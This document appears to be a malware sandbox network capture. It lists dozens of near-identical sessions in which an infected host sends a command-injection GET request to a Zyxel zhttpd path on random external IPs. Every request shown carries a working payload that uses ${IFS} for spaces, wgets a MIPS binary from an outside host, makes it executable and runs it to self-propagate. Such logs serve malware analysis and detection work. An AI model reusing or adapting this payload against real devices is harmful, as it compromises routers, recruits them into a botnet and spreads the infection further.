                                      Jan 14, 2024 15:51:01.649306059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8218192.168.2.143894254.148.144.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649358034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8219192.168.2.143827437.6.130.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649415970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8220192.168.2.144271831.74.107.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649430037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8221192.168.2.1441816100.127.5.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649465084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8222192.168.2.1434894161.14.156.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649506092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8223192.168.2.1448006172.10.61.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649538994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8224192.168.2.145947494.19.188.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649569035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8225192.168.2.144289868.227.202.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649621964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8226192.168.2.1444758115.205.48.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649667025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8227192.168.2.1450242167.18.195.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649699926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8228192.168.2.143305076.101.78.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649749994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8229192.168.2.146066880.67.95.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649807930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8230192.168.2.145590837.209.60.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649852037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8231192.168.2.1460252106.109.152.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649863958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8232192.168.2.1458200150.110.204.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649915934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8233192.168.2.1438648141.144.137.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.649967909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8234192.168.2.1449786222.146.113.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650001049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8235192.168.2.1447792163.74.10.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650038004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8236192.168.2.145768851.221.241.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650070906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8237192.168.2.1444116184.103.222.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650121927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8238192.168.2.145063437.119.84.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650165081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8239192.168.2.144492839.147.190.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650214911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8240192.168.2.145563443.2.185.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650244951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8241192.168.2.1455742121.235.250.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650281906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8242192.168.2.145510235.192.126.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650320053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8243192.168.2.143955286.228.230.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650373936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8244192.168.2.1434526220.171.121.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650412083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8245192.168.2.143584634.219.107.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650439024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8246192.168.2.1452726174.68.239.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650480032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8247192.168.2.145698270.155.23.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650518894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8248192.168.2.14531285.244.221.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650556087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8249192.168.2.1444304209.212.63.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650582075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8250192.168.2.1450898180.41.90.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650640011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8251192.168.2.143588642.138.32.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650687933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8252192.168.2.1451056213.230.151.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650739908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8253192.168.2.143393085.67.109.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650778055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8254192.168.2.144657074.229.140.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650814056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8255192.168.2.144385872.180.118.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650835991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8256192.168.2.1459158138.51.52.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650886059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8257192.168.2.1451410129.208.205.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650928020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8258192.168.2.1450756179.66.204.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.650954008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8259192.168.2.1433290203.28.72.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651005030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8260192.168.2.1444086107.94.67.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651040077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8261192.168.2.1437830108.69.238.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651082993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8262192.168.2.1450292217.84.216.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651123047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8263192.168.2.1439668142.224.179.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651154041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8264192.168.2.1459060159.230.188.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651187897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8265192.168.2.1439104102.107.19.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651249886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8266192.168.2.1447752171.164.84.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651276112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8267192.168.2.1439116130.226.178.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651315928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8268192.168.2.1448874113.3.45.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651350975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8269192.168.2.1436254202.206.135.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651371956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8270192.168.2.145833098.15.38.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651416063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8271192.168.2.143840886.224.190.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651452065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8272192.168.2.1437184196.106.179.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651499033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8273192.168.2.1460274141.173.87.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651542902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8274192.168.2.143358497.125.69.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651581049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8275192.168.2.1432926212.184.124.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651614904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8276192.168.2.145331699.215.179.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651669025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8277192.168.2.1445918123.158.250.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651696920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8278192.168.2.144009625.57.67.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651731968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8279192.168.2.143724464.0.227.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:01.651757956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8280192.168.2.144113077.97.151.224443
                                      TimestampBytes transferredDirectionData
